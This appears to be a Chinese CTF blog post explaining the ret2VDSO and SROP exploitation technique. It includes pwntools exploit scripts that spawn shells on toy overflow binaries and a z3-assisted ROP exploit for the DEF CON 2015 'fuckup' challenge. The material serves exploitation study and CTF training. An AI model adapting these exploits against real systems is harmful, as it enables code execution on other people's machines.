<!DOCTYPE html>
<html lang="en">





<head><meta name="generator" content="Hexo 3.8.0">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#005f6b">
  <meta name="description" content="ZJGSU-IS-17">
  <meta name="author" content>
  <meta name="keywords" content>
  <title>Use SROP with ret2VDSO - AssassinQ</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">


  <link rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css">

<link rel="stylesheet" href="/css/main.css">


  <link defer rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css">


<!-- 自定义样式保持在最底部 -->


<link rel="alternate" href="/atom.xml" title="AssassinQ" type="application/atom+xml"><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>


<body>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">&nbsp;<strong>AssassinQ</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">Home</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">Archives</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">Tags</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">About</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">Links</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <p class="mt-3 post-meta">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>
                  Saturday, March 14th 2020, 10:24 am
                </p>
              

              <p class="mt-1">
                
                  
                  <span class="post-meta">
                    <i class="far fa-chart-bar"></i>
                    3.1k 字
                  </span>
                

                
                  
                  <span class="post-meta">
                      <i class="far fa-clock"></i>
                      16 分钟
                  </span>
                

                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5 z-depth-3" id="board">
          <div class="post-content mx-auto" id="post">
            
            <div class="markdown-body">
              <p>用 SROP 的时候，一般情况下很难找得到 <code>syscall ; ret</code>，这时就需要在 VDSO 中找了。</p>
<a id="more"></a>
<h1 id="What-is-VDSO"><a href="#What-is-VDSO" class="headerlink" title="What is VDSO"></a>What is VDSO</h1><p>VDSO（Virtual Dynamically-linked Shared Object）是个很有意思的东西，它是虚拟的，与虚拟内存一样，在计算机中本身并不存在。因为有些系统调用经常被用户使用，这就会出现大量的用户态与内核态切换的开销。VDSO 将内核态的调用映射到用户态的地址空间中，可以大量减少这样的开销，同时也可以使路径更好。</p>
<blockquote>
<p>这里路径更好指的是，不需要使用传统的 <code>int 0x80</code> 来进行系统调用，不同的处理器实现了不同的快速系统调用指令（Intel 实现了 <code>sysenter</code>、<code>sysexit</code>；AMD 实现了 <code>syscall</code>、<code>sysret</code>），由此自然就会出现兼容性问题。所以 Linux 实现了 <code>vsyscall</code> 接口，在底层会根据具体的结构来进行具体操作。而 <code>vsyscall</code> 就实现在 VDSO 中。</p>
</blockquote>
<p>Linux（2.6 及以上的版本）环境下执行 <code>ldd /bin/sh</code>，会发现有个名字叫 <code>linux-vdso.so.1</code>（老点的版本是 <code>linux-gate.so.1</code>）的动态文件，而系统中却找不到它，它就是 VDSO。例如：</p>
<pre><code class="bash">$ ldd /bin/sh
    linux-vdso.so.1 =&gt;  (0x00007ffda1746000)
    libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007f9a4da29000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f9a4e01b000)
</code></pre>
<p>不光是快速系统调用，glibc 现在也提供了 VDSO 的支持，<code>open()</code>、<code>read()</code>、<code>write()</code>、<code>gettimeofday()</code> 都可以直接用 VDSO 中的实现，使得这些调用更快，glibc 更兼容，内核新特性在不影响 glibc 的情况下也可以更快的部署。</p>
<h2 id="Why-ret2VDSO"><a href="#Why-ret2VDSO" class="headerlink" title="Why ret2VDSO?"></a>Why ret2VDSO?</h2><p>在 x86 系统中，传统的系统调用 <code>int 0x80</code> 并没有很好的效果，因此在 Intel 新型的 CPU 提供了新的系统调用指令（2.6 及以上的版本支持新型系统调用机制）：</p>
<ul>
<li><code>sysenter</code></li>
<li><code>sysexit</code></li>
</ul>
<p>VDSO 可以降低在传统的 <code>int 0x80</code> 的额外开销以及提供了 <code>sigreturn</code> 可以使用 SROP。</p>
<p>其中 vsyscall 固定地址中存在 <code>syscall ; ret</code>：</p>
<pre><code class="gdb">assassinq&gt;&gt; x/3i 0xffffffffff600000
   0xffffffffff600000:    mov    rax,0x60
   0xffffffffff600007:    syscall
   0xffffffffff600009:    ret
</code></pre>
<p>可以写一个程序做一个系统调用的测试：</p>
<pre><code class="cpp">#include &lt;time.h&gt;
#include &lt;stdio.h&gt;

typedef time_t (*time_func)(time_t *);

int main(int argc, char *argv[]) {
    time_t tloc;
    int retval = 0;
    time_func func = (time_func) 0xffffffffff600000;

    retval = func(&amp;tloc);
    if (retval &lt; 0) {
        perror(&quot;time_func&quot;);
        return -1;
    }
    printf(&quot;%ld\n&quot;, tloc);
    return 0;
}
</code></pre>
<p>总而言之，就是在 VDSO 中存在 <code>syscall ; ret</code> 可以被 SROP 利用。</p>
<h2 id="How-ret2VDSO"><a href="#How-ret2VDSO" class="headerlink" title="How ret2VDSO?"></a>How ret2VDSO?</h2><p><code>sysenter</code> 其参数传递方式和 <code>int 0x80</code> 是一样的，但是需要先做好 Function Prologue：</p>
<pre><code class="asm">push ebp ; mov ebp, esp
</code></pre>
<p>以及需要找到一个好的 Gadget 来做 Stack Pivot。</p>
<h2 id="ret2VDSO-Theory"><a href="#ret2VDSO-Theory" class="headerlink" title="ret2VDSO Theory"></a>ret2VDSO Theory</h2><p>获取 VDSO 的方法：</p>
<ol>
<li>暴力破解</li>
<li>通过泄漏<ul>
<li>使用 ld.so 中的 <code>_libc_stack_end</code> 找到 stack 其实位置，计算 ELF Auxiliary Vector Offset 并从中取出 <code>AT_SYSINFO_EHDR</code>；</li>
<li>使用 ld.so 中的 <code>_rtld_global_ro</code> 的某个 Offset 也有 VDSO 的位置。</li>
<li>尤其注意的是在开了 ASLR 的情况下，VDSO 的利用是有一定优势的<ul>
<li>在 x86 环境下：只有一个字节是随机的，所以我们可以很容易暴力解决；</li>
<li>在 x64 环境下：在开启了 PIE 的情形下，有 11 字节是随机的，例如：CVE-2014-9585。但是在 Linux 3.182.2 版本之后，这个已经增加到了 18 个字节的随机</li>
</ul>
</li>
</ul>
</li>
</ol>
<p>查看存储 VDSO 的地址：</p>
<pre><code class="gdb">assassinq&gt;&gt; p &amp;_rtld_global_ro._dl_sysinfo_dso
$1 = (const Elf32_Ehdr **) 0xf7ffced4 &lt;_rtld_global_ro+468&gt;
</code></pre>
<p>查看 VDSO 的地址（直接 vmmap 也行）：</p>
<pre><code class="gdb">assassinq&gt;&gt; p _rtld_global_ro._dl_sysinfo_dso
$2 = (const Elf32_Ehdr *) 0xf7fd8000
</code></pre>
<p>通过 ELF Auxiliary Vector Offset 计算出 VDSO 的地址（泄露相应的栈上的值）：</p>
<pre><code class="gdb">assassinq&gt;&gt; info auxv
32   AT_SYSINFO           Special system info/entry points 0xf7fd8b50
33   AT_SYSINFO_EHDR      System-supplied DSO&#39;s ELF header 0xf7fd8000 &lt;--- Address of VDSO
16   AT_HWCAP             Machine-dependent CPU capability hints 0x9f8bfbff
6    AT_PAGESZ            System page size               4096
17   AT_CLKTCK            Frequency of times()           100
3    AT_PHDR              Program headers for program    0x8048034
4    AT_PHENT             Size of program header entry   32
5    AT_PHNUM             Number of program headers      9
7    AT_BASE              Base address of interpreter    0xf7fd9000
8    AT_FLAGS             Flags                          0x0
9    AT_ENTRY             Entry point of program         0x8048340
11   AT_UID               Real user ID                   0
12   AT_EUID              Effective user ID              0
13   AT_GID               Real group ID                  0
14   AT_EGID              Effective group ID             0
23   AT_SECURE            Boolean, was exec setuid-like? 0
25   AT_RANDOM            Address of 16 random bytes     0xffffd8cb
31   AT_EXECFN            File name of executable        0xffffdfd8 &quot;/root/tmp/ret2VDSO_Example/main&quot;
15   AT_PLATFORM          String identifying platform    0xffffd8db &quot;i686&quot;
0    AT_NULL              End of vector                  0x0
</code></pre>
<p>事实证明 VDSO 也没有非常随机，可以做一个测试：</p>
<pre><code class="bash">$ ldd /bin/ls
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    libselinux.so.1 =&gt; /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007ffff7bb5000)
    libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff77eb000)
    libpcre.so.3 =&gt; /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007ffff757b000)
    libdl.so.2 =&gt; /lib/x86_64-linux-gnu/libdl.so.2 (0x00007ffff7377000)
    /lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd7000)
    libpthread.so.0 =&gt; /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007ffff715a000)

$ while true; do ldd /bin/ls; done | grep 0x00007ffff7ffa000
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    linux-vdso.so.1 =&gt;  (0x00007ffff7ffa000)
    ...
</code></pre>
<h1 id="Example"><a href="#Example" class="headerlink" title="Example"></a>Example</h1><p>32 位下对 VDSO 进行爆破。程序如下，读入 0x400 的字节，足够塞一个构造的 sigcontext 了：</p>
<pre><code class="cpp">#include &lt;stdio.h&gt;
#include &lt;unistd.h&gt;

char buf[10] = &quot;/bin/sh\x00&quot;;

void pwnme() {
    char s[0x100];
    char *welcome = &quot;&gt; &quot;;
    write(1, welcome, 2);
    read(0, s, 0x400);
}

int main() {
    pwnme();
    return 0;
}
</code></pre>
<p>同时，我们在 VDSO 中可以找到 sigreturn 所对应的调用：</p>
<pre><code class="gdb">assassinq&gt;&gt; x/3i 0xf7fd8b71
   0xf7fd8b71 &lt;__kernel_sigreturn+1&gt;:    mov    eax,0x77
   0xf7fd8b76 &lt;__kernel_sigreturn+6&gt;:    int    0x80
   0xf7fd8b78 &lt;__kernel_sigreturn+8&gt;:    nop
</code></pre>
<p>关闭 ASLR 对 ret2VDSO 进行测试：</p>
<pre><code class="python">#!/usr/bin/env python
from pwn import *

context.log_level = &#39;debug&#39;
context.terminal = [&#39;lxterminal&#39;, &#39;-e&#39;]
context.arch = &#39;i386&#39;

bin_sh_addr = 0x804a020
bss_addr = 0x804a030

p = process(&#39;./main&#39;)

#gdb.attach(p)

vdso_addr = 0xf7fd8000
print &#39;Try vdso %s&#39; % hex(vdso_addr)

payload = &#39;A&#39; * 0x110
frame = SigreturnFrame(kernel=&quot;i386&quot;)
frame.eax = constants.SYS_execve
frame.ebx = bin_sh_addr
frame.eip = vdso_addr + 0xb76 # address of int 0x80
frame.esp = bss_addr
frame.ebp = bss_addr
frame.gs = 0x63
frame.cs = 0x23
frame.es = 0x2b
frame.ds = 0x2b
frame.ss = 0x2b
ret_addr = vdso_addr + 0xb71 # address of sigreturn
payload += p32(ret_addr) + str(frame)
p.recvuntil(&#39;&gt; &#39;)
p.sendline(payload)

p.sendline(&#39;echo pwned&#39;)
data = p.recvuntil(&#39;pwned&#39;)
if data != &#39;pwned&#39;:
    raise Exception, &#39;Failed&#39;

p.interactive()
</code></pre>
<p>打开 ASLR 之后对 VDSO 进行爆破（32 位是 $\frac{1}{256}$ 的概率）：</p>
<pre><code class="python">#!/usr/bin/env python
from pwn import *

bin_sh_addr = 0x804a020
bss_addr = 0x804a030
vdso_range = range(0xf7600000, 0xf7700000, 0x1000)

def bruteforce():
    global p
    context.arch = &#39;i386&#39;
    p = process(&#39;./main&#39;)
    global vdso_addr
    vdso_addr = random.choice(vdso_range)
    print &#39;Try vdso %s&#39; % hex(vdso_addr)
    payload = &#39;A&#39; * 0x110
    frame = SigreturnFrame(kernel=&quot;i386&quot;)
    frame.eax = constants.SYS_execve
    frame.ebx = bin_sh_addr
    frame.eip = vdso_addr + 0xb76 # address of int 0x80
    frame.esp = bss_addr
    frame.ebp = bss_addr
    frame.gs = 0x63
    frame.cs = 0x23
    frame.es = 0x2b
    frame.ds = 0x2b
    frame.ss = 0x2b
    ret_addr = vdso_addr + 0xb71 # address of sigreturn
    payload += p32(ret_addr) + str(frame)
    p.recvuntil(&#39;&gt; &#39;)
    p.send(payload)
    p.sendline(&#39;echo pwned&#39;)
    data = p.recvuntil(&#39;pwned&#39;)
    if data != &#39;pwned&#39;:
        info(&#39;Failed&#39;)
    return

if __name__ == &#39;__main__&#39;:
    global p, vdso_addr
    i = 1
    while True:
        print &#39;Try %d&#39; % i
        try:
            bruteforce()
        except Exception as e:
            info(&#39;Wrong VDSO&#39;)
            p.close()
            i += 1
            continue
        info(&#39;vdso_addr = &#39; + hex(vdso_addr))
        break
    p.interactive()
</code></pre>
<h1 id="Example-x64"><a href="#Example-x64" class="headerlink" title="Example_x64"></a>Example_x64</h1><p>64 位下使用 AXUV 泄漏 VDSO 的例子。主要是输入一串长为 1024 的字符串：</p>
<pre><code class="nasm">section .text

global _start
jmp _start
vuln:
sub rsp, 8
mov rax, 0 ; sys_read
xor rdi, rdi
mov rsi, rsp
mov rdx, 1024
syscall
add rsp, 8
ret

_start:
call vuln
mov rax, 60 ; sys_exit
xor rdi, rdi
syscall

gadgets:
mov rdi, 1
ret
mov rax, 15
ret
syscall
ret
</code></pre>
<p>尝试利用 vsyscall 中的 <code>syscall ; ret</code> 没能成功，所以在程序后面又加了一个 Gadget 用来构造（具体什么原因没有找到）。在栈上泄漏 AUXV 之后，可以获取 VDSO 的基址以及输入的字符串在栈上的地址。脚本如下：</p>
<pre><code class="python">#!/usr/bin/env python
from pwn import *

context.log_level = &#39;debug&#39;
context.arch = &#39;amd64&#39;
#context.terminal = [&#39;lxterminal&#39;, &#39;-e&#39;]

p = process(&#39;./main&#39;)

# id&#39;s of Auxillary Vectors
AT_SYSINFO_EHDR = 0x21
AT_HWCAP = 0x10
AT_PAGESZ = 0x06
AT_CLKTCK = 0x11
AT_PHDR = 0x03
AT_PHENT = 0x04
AT_PHNUM = 0x05
AT_BASE = 0x07
AT_FLAGS = 0x08
AT_ENTRY = 0x09
AT_UID = 0x0b
AT_EUID = 0x0c
AT_GID = 0x0d
AT_EGID = 0x0e
AT_SECURE = 0x17
AT_RANDOM = 0x19
AT_EXECFN = 0x1f
AT_PLATFORM = 0x0f

gdb.attach(p)

vuln_addr = 0x400082
set_write = 0x4000ac
syscall_addr = 0x400096
set_sigreturn = 0x4000b2

payload = &#39;/bin/sh\x00&#39;
payload += p64(vuln_addr)
payload += p64(set_write)
payload += p64(syscall_addr)
payload += &#39;A&#39; * 8
payload += p64(vuln_addr)
raw_input(&#39;@&#39;)
p.send(payload)

payload = &#39;A&#39;
raw_input(&#39;@&#39;)
p.send(payload)
ENV_AUX_VEC = p.recv(1024)
QWORD_LIST = []
for i in range(0, len(ENV_AUX_VEC), 8):
    QWORD_LIST.append(u64(ENV_AUX_VEC[i:i + 8]))
start_aux_vec = QWORD_LIST.index(AT_SYSINFO_EHDR) # 计算AUXV的起始地址
info(hex(start_aux_vec))
AUX_VEC_ENTRIES = QWORD_LIST[start_aux_vec: start_aux_vec + (18 * 2)] # size of auxillary table
AUX_VEC_ENTRIES = dict(AUX_VEC_ENTRIES[i:i + 2] for i in range(0, len(AUX_VEC_ENTRIES), 2))
vdso_addr = AUX_VEC_ENTRIES[AT_SYSINFO_EHDR]
info(&quot;vdso_addr = &quot; + hex(vdso_addr))
bin_sh_addr = AUX_VEC_ENTRIES[AT_RANDOM] - 0x379 # 获取“/bin/sh”地址
info(&quot;bin_sh_addr = &quot; + hex(bin_sh_addr))

syscall_ret = 0xffffffffff600007
syscall_ret = 0x4000b8

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = bin_sh_addr
frame.rip = syscall_addr
payload = &#39;A&#39; * 8 + p64(set_sigreturn) + p64(syscall_ret) + str(frame)
raw_input(&#39;@&#39;)
p.send(payload)

p.interactive()
</code></pre>
<h1 id="fuckup"><a href="#fuckup" class="headerlink" title="fuckup"></a>fuckup</h1><p>2015 Defcon Quals 中这道题可以使用 ret2VDSO 和 SROP。具体没能复现出来，主要理解一下思想。</p>
<pre><code class="bash">$ checksec ./fuckup
[*] &#39;/home/beale/Desktop/2015-Defcon-Quals-fuckup/fuckup&#39;
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
</code></pre>
<p>总共有五个选项，选项 2 会修改程序段和栈的基址，并重新指向新的地址；选项 3 会告诉我们当前的随机数并再次随机化程序段；选项 4 中可以进行溢出：</p>
<pre><code class="bash">$ ./fuckup
Welcome to Fully Unguessable Convoluted Kinetogenic Userspace Pseudoransomization, the new and improved ASLR.
This app is to help prove the benefits of F.U.C.K.U.P.
Main Menu
---------
1. Display info
2. Change random
3. View state info
4. Test stack smash
-------
0. Quit
</code></pre>
<p>在选项 2 的代码反编译后可以看到，每次用户执行命令时，程序会根据类似于 WELL512 的生成算法生成的随机数，改变二进制映射的存储器的基址：</p>
<pre><code class="cpp">int sub_80481A6()
{
  ...
  do
  {
    seed_1 = WELL512() * 4294967295.0;
    seed_2 = (signed __int64)seed_1;
    addy = (void *)(seed_2 &amp; 0xFFFFF000);
    actual = my_mmap(seed_2 &amp; 0xFFFFF000, 28672, 3, 34, -1, 0, v0, v0);
  }
  while ( (seed_2 &amp; 0xFFFFF000) != actual );
  qmemcpy(addy, dword_804EB40, 0x7000u);
  my_mprotect(addy, 0x4000u, 5);
  ...
}
</code></pre>
<p>普通的思路肯定是做不了的。使用 VDSO 的思路大致如下：</p>
<ul>
<li>因为 32 位下 VDSO 只有 1 字节是随机的，可以暴力破解</li>
<li>直接溢出改返回地址，但只有 100 个字节<ul>
<li>首先先利用 VDSO 的 Gadget 做出 sys_read 并加大输入的大小</li>
<li>将读入的内容放到 TLS（TLS 的位置在 VDSO 前一页）</li>
<li>使用 sysenter 将栈转移到 TLS 段</li>
<li>在第二次输入的时候将 /bin/sh 放到 TLS 段（这个时候栈已经搬到 TLS 了）</li>
</ul>
</li>
<li>接着把 Sigreturn Gadget 以及 Fake Signal Frame 一并放进，然后可以直接 execve 执行 /bin/sh</li>
<li>循环直到成功 get shell</li>
</ul>
<p>还可以通过 z3 对伪随机数进行预测，脚本如下：</p>
<pre><code class="python">#!/usr/bin/env python
from pwn import *
from z3 import *
import time

context.log_level = &#39;debug&#39;
context.arch = &#39;i386&#39;
state = [BitVec(&quot;a1_{0}&quot;.format(i), 32) for i in range(16)]

def m(x):
    return p32(x + offset)

def well512(index):
    idx = (index+15) &amp; 15
    a = state[index]
    c = state[(index+13) &amp; 15]
    b = a ^ c ^ ((a &lt;&lt; 16) &amp; 0xffffffff) ^ ((c &lt;&lt; 15) &amp; 0xffffffff)
    c = state[(index+9) &amp; 15]
    c ^= (c &gt;&gt; 11)
    state[(index+10) &amp; 15] = c ^ b
    a = state[idx]
    d = ((32 * (c ^ b)) &amp; 0xDA442D24) ^ c ^ b
    state[idx] = a ^ b ^ d ^ ((a &lt;&lt; 2) &amp; 0xffffffff) ^ (
        (b &lt;&lt; 18) &amp; 0xffffffff) ^ ((c &lt;&lt; 28) &amp; 0xffffffff)
    return idx

def well512_z3(index):
    idx = (index+15) &amp; 15
    a = state[index]
    c = state[(index+13) &amp; 15]
    b = a ^ c ^ (a &lt;&lt; 16) ^ (c &lt;&lt; 15)
    c = state[(index+9) &amp; 15]
    c ^= LShR(c, 11)
    a = state[idx]
    state[(index+10) &amp; 15] = b ^ c
    d = ((32 * (c ^ b)) &amp; 0xDA442D24) ^ c ^ b
    a = state[idx]
    state[idx] = a ^ b ^ d ^ (a &lt;&lt; 2) ^ (b &lt;&lt; 18) ^ (c &lt;&lt; 28)
    return idx

def find_state(recv):
    info(&#39;Start find state.&#39;)
    global state
    z = Solver()
    idx = 15
    for r in recv:
        idx = well512_z3(idx)
        z.add(state[idx] == r + 1)
    return z

p = process(&#39;./fuckup&#39;)

def choice(c):
    p.recvuntil(&#39;Quit\n&#39;)
    p.sendline(str(c))

r_list = []
for i in range(15):
    choice(3)
    sleep(0.1)
    r = int(p.recv(0x20)[0x11:0x19], 16)
    r_list.append(r)
info(r_list)
z = find_state(r_list)
info(&#39;Solver result =&gt; &#39; + str(z.check()))
next_state = dict()
model = z.model()
for i in model:
    idx = int(str(i)[3:])
    val = model[i].as_long()
    next_state[idx] = val
info(next_state)
for i in range(16):
    if i in next_state:
        state[i] = next_state[i]
idx = 15
for i in range(15):
    idx = well512(idx)
idx = well512(idx)
predict_val = state[idx] - 1
info(&#39;predict_val = &#39; + hex(predict_val))
current_base = 0xfffff000 &amp; predict_val
info(&#39;current_base = &#39; + hex(current_base))

base = 0x8048000
offset = current_base - base
# 0x0804908f : pop eax ; pop ebx ; pop esi ; ret
pop_eax_ebx_esi_ret = 0x0804908f
# 0x0804961a : pop edx ; pop ecx ; pop ebx ; ret
pop_edx_ecx_ebx_ret = 0x0804961a
# 0x0804875f : int 0x80
int_0x80 = 0x0804875f

payload = &#39;A&#39; * 0x16
payload += m(pop_eax_ebx_esi_ret)
payload += p32(0x7D)
payload += p32(0)
payload += p32(0)
payload += m(pop_edx_ecx_ebx_ret)
payload += p32(0x7)
payload += p32(0x1000)
payload += p32(current_base)
payload += m(int_0x80)
payload += m(pop_eax_ebx_esi_ret)
payload += p32(0x3)
payload += p32(0)
payload += p32(0)
payload += m(pop_edx_ecx_ebx_ret)
payload += p32(0x100)
payload += p32(current_base)
payload += p32(0)
payload += m(int_0x80)
payload += p32(current_base)
payload = payload.ljust(100, &#39;A&#39;)
payload += asm(shellcraft.sh())
p.sendline(&#39;4&#39;)
p.sendline(payload)
p.interactive()
</code></pre>
<h1 id="References"><a href="#References" class="headerlink" title="References"></a>References</h1><p><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop-zh/#ret2vdso" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop-zh/#ret2vdso</a><br><a href="http://adam8157.info/blog/2011/10/linux-vdso/" target="_blank" rel="noopener">http://adam8157.info/blog/2011/10/linux-vdso/</a><br><a href="https://bestwing.me/stack-overflow-three-SROP.html" target="_blank" rel="noopener">https://bestwing.me/stack-overflow-three-SROP.html</a><br><a href="https://www.anquanke.com/post/id/85810" target="_blank" rel="noopener">https://www.anquanke.com/post/id/85810</a><br><a href="https://binlep.github.io/2020/03/03/%E3%80%90Pwn%20%E7%AC%94%E8%AE%B0%E3%80%91%E6%A0%88%E6%BA%A2%E5%87%BA%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93%20--%20Advanced%20ROP/" target="_blank" rel="noopener">https://binlep.github.io/2020/03/03/%E3%80%90Pwn%20%E7%AC%94%E8%AE%B0%E3%80%91%E6%A0%88%E6%BA%A2%E5%87%BA%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93%20--%20Advanced%20ROP/</a><br><a href="https://www.voidsecurity.in/2014/12/return-to-vdso-using-elf-auxiliary.html" target="_blank" rel="noopener">https://www.voidsecurity.in/2014/12/return-to-vdso-using-elf-auxiliary.html</a><br><a href="https://vvl.me/2019/06/linux-syscall-and-vsyscall-vdso-in-x86/" target="_blank" rel="noopener">https://vvl.me/2019/06/linux-syscall-and-vsyscall-vdso-in-x86/</a><br><a href="https://pwnexpoit.tistory.com/13" target="_blank" rel="noopener">https://pwnexpoit.tistory.com/13</a></p>

            </div>
            <hr>
            <div>
              <p>
                
                
                  <span>
                <i class="iconfont icon-tag"></i>
                    
                      <a class="hover-with-bg" href="/tags/ctf/">ctf</a>
                    
                      <a class="hover-with-bg" href="/tags/pwn/">pwn</a>
                    
                  </span>
                
              </p>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-12 col-md-6">
                    
                      <a href="/2020/03/19/SameBall-exe-v1-02-注册码算法浅析/">
                        <i class="fa fa-chevron-left"></i>
                        <span>SameBall.exe v1.02 注册码算法浅析</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-12 col-md-6">
                    
                      <a href="/2020/03/13/Understanding-SigReturn-Oriented-Programming/">
                        <span>Understanding SigReturn-Oriented-Programming</span>
                        <i class="fa fa-chevron-right"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

              
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc-start"></div>
<div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="http://blog.b3ale.cn" target="_blank" rel="nofollow noopener"><b>Hard Work Pays Off.</b></a>
    </div>
    
  <div>
    
      <!-- 不蒜子统计PV -->
      
      <span id="busuanzi_container_site_pv" style="display: none">
      总访问量 <span id="busuanzi_value_site_pv"></span> 次
    </span>
    
    
      <!-- 不蒜子统计UV -->
      
      <span id="busuanzi_container_site_uv" style="display: none">
      总访客数 <span id="busuanzi_value_site_uv"></span> 人
    </span>
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js"></script>
<script src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js"></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js"></script>
<script src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js"></script>
<script src="/js/main.js"></script>


  <script src="/js/lazyload.js"></script>



  
  <script src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js"></script>
  <script>
    $(document).ready(function () {
